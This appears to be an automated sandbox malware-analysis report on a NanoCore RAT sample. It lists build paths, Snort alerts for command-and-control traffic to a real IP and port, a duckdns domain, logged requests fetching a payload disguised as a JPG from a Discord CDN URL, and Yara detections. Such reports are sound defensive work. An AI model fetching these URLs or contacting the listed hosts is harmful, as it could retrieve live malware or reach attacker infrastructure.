            Source: Binary string: eTe^eDe\svchost.PDB source: svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: mscorlib.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: \??\C:\Windows\System.pdb source: svchost.exe, 0000001B.00000000.379905737.0000000007412000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: System.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: i0C:\Windows\mscorlib.pdb source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.312445767.00000000006F8000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: System.Windows.Forms.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.pdb@ source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: mscorlib.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Windows.Forms.pdbLEDmT3 source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: Microsoft.VisualBasic.pdbd source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Drawing.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdb source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Configuration.ni.pdbRSDSO* source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.pdb4 source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.Drawing.pdbb source: WERCEBB.tmp.dmp.19.dr
            Source: Binary string: C:\Users\user\Desktop\s9SWgUgyO5.PDB source: s9SWgUgyO5.exe, 00000000.00000000.270661629.0000000000DC8000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.pdbD source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: s9SWgUgyO5.exe, 0000000A.00000002.515818035.0000000002CFC000.00000004.00000001.sdmp
            Source: Binary string: svchost.PDB source: svchost.exe, 0000001B.00000000.380977185.0000000000EF8000.00000004.00000001.sdmp
            Source: Binary string: System.Xml.ni.pdbRSDS source: WER62AE.tmp.dmp.39.dr
            Source: Binary string: System.Core.pdbi source: WER1CFA.tmp.dmp.34.dr
            Source: Binary string: System.ni.pdb source: WER62AE.tmp.dmp.39.dr
            Source: C:\Users\user\Desktop\s9SWgUgyO5.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]

            Networking:

            barindex
            Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49741 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49746 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49750 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49753 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49754 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49756 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49758 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49759 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49760 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49761 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49762 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49765 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49768 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49770 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49777 -> 194.147.140.25:6746
            Source: TrafficSnort IDS: 2025019 ET TROJAN Possible NanoCore C2 60B 192.168.2.5:49778 -> 194.147.140.25:6746
            System process connects to network (likely due to code injection or exploit)Show sources
            Source: C:\Users\Public\Documents\???????????????\svchost.exeDomain query: cdn.discordapp.com
            Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.133.233 443
            Source: C:\Users\Public\Documents\???????????????\svchost.exeNetwork Connect: 162.159.130.233 443
            Uses dynamic DNS servicesShow sources
            Source: unknownDNS query: name: friomo.duckdns.org
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49736 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 162.159.133.233:443 -> 192.168.2.5:49742 version: TLS 1.0
            Source: unknownHTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.5:49748 version: TLS 1.0
            Source: global trafficTCP traffic: 192.168.2.5:49741 -> 194.147.140.25:6746
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
            Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49736
            Source: s9SWgUgyO5.exe, 00000000.00000000.271428414.0000000001394000.00000004.00000020.sdmp, svchost.exe, 00000009.00000002.515319906.000002207E663000.00000004.00000001.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: svchost.exe, 00000009.00000002.515319906.000002207E663000.00000004.00000001.sdmpString found in binary or memory: http://crl.ver)
            Source: s9SWgUgyO5.exe, 0000000A.00000002.526184455.0000000006FF0000.00000004.00020000.sdmpString found in binary or memory: http://google.com
            Source: s9SWgUgyO5.exe, 00000000.00000000.282547862.0000000002EC1000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.368578421.0000000002AA1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.383088847.0000000003211000.00000004.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: svchost.exe, 00000015.00000002.321159443.00000184E6E13000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
            Source: svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpString found in binary or memory: https://%s.dnet.xboxlive.com
            Source: svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpString found in binary or memory: https://%s.xboxlive.com
            Source: svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpString found in binary or memory: https://activity.windows.com
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
            Source: svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpString found in binary or memory: https://bn2.notify.windows.com/v2/register/xplatform/device
            Source: s9SWgUgyO5.exe, 00000000.00000000.282547862.0000000002EC1000.00000004.00000001.sdmp, svchost.exe, 0000000E.00000000.368578421.0000000002AA1000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000000.383088847.0000000003211000.00000004.00000001.sdmpString found in binary or memory: https://cdn.discordapp.com
            Source: s9SWgUgyO5.exeString found in binary or memory: https://cdn.discordapp.com/attachments/886962207051640872/890689205934620692/4102A6C4.jpg
            Source: svchost.exe, 00000010.00000002.511181414.0000020ADC43E000.00000004.00000001.sdmpString found in binary or memory: https://co4-df.notify.windows.com/v2/register/xplatform/device
            Source: svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Traffic/Incidents/
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000003.320632083.00000184E6E46000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000015.00000002.321257361.00000184E6E5C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
            Source: svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
            Source: svchost.exe, 00000015.00000002.321223246.00000184E6E42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
            Source: svchost.exe, 00000015.00000002.321223246.00000184E6E42000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
            Source: svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
            Source: svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000003.317511833.00000184E6E5D000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.315510750.00000184E6E64000.00000004.00000001.sdmp, svchost.exe, 00000015.00000003.319122610.00000184E6E5A000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t
            Source: svchost.exe, 00000015.00000003.317073494.00000184E6E61000.00000004.00000001.sdmpString found in binary or memory: https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/
            Source: svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpString found in binary or memory: https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v=
            Source: svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx
            Source: svchost.exe, 00000015.00000002.321159443.00000184E6E13000.00000004.00000001.sdmp, svchost.exe, 00000015.00000002.321213587.00000184E6E3C000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r=
            Source: svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r=
            Source: svchost.exe, 00000015.00000003.320668610.00000184E6E56000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r=
            Source: svchost.exe, 00000015.00000003.291332934.00000184E6E31000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r=
            Source: svchost.exe, 00000015.00000002.321205709.00000184E6E3A000.00000004.00000001.sdmpString found in binary or memory: https://t0.ssl.ak.tiles.virtualearth.net/tiles/gen
            Source: svchost.exe, 00000015.00000003.320632083.00000184E6E46000.00000004.00000001.sdmpString found in binary or memory: https://t0.tiles.ditu.live.com/tiles/gen
            Source: unknownDNS traffic detected: queries for: cdn.discordapp.com
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: global trafficHTTP traffic detected: GET /attachments/886962207051640872/890689205934620692/4102A6C4.jpg HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
            Source: s9SWgUgyO5.exe, 00000000.00000000.270897208.000000000131A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>
            Source: s9SWgUgyO5.exe, 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmpBinary or memory string: RegisterRawInputDevices

            E-Banking Fraud:

            barindex
            Yara detected Nanocore RATShow sources
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 10.2.s9SWgUgyO5.exe.48b3891.17.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.49a0da0.9.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 14.0.svchost.exe.4914f80.21.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 27.0.svchost.exe.5084f80.20.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 0000000A.00000002.509785046.0000000000402000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.515373653.0000000002C91000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.376574756.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.360439526.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522820033.00000000048AA000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000E.00000000.382552554.0000000004914000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.522346624.0000000003CE7000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.525659501.00000000060A0000.00000004.00020000.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000001B.00000000.390942305.0000000005084000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000000.288438993.0000000004189000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 6376, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: s9SWgUgyO5.exe PID: 7060, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 4956, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 6728, type: MEMORYSTR

            System Summary:

            barindex
            Malicious sample detected (through community Yara rule)Show sources
            Source: 10.2.s9SWgUgyO5.exe.4627f21.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.71b0000.33.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.21.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.21.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.20.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.4648782.8.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4648782.8.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.60a0000.20.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4634155.9.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2cbc998.2.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6fb0000.24.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6000000.18.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6e30000.23.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6e20000.22.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.3.s9SWgUgyO5.exe.48edd1f.2.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.481b13f.14.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5084f80.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.7000000.29.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.71e0000.35.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.47ae62e.11.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.60a4629.19.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6fd0000.26.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.4914f80.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.48aa432.15.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d14b78.4.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.3cf8a18.6.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6ff0000.28.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.7150000.30.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.71b4c9f.34.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.6fe0000.27.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.483239e.12.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 14.0.svchost.exe.49a0da0.9.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.3.s9SWgUgyO5.exe.48edd1f.2.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.3cfd041.7.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.10.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
            Source: 10.2.s9SWgUgyO5.exe.6fc0000.25.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.2d20dc0.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.7180000.31.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.4823f6e.13.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 10.2.s9SWgUgyO5.exe.48af268.16.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
            Source: 27.0.svchost.exe.5110da0.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
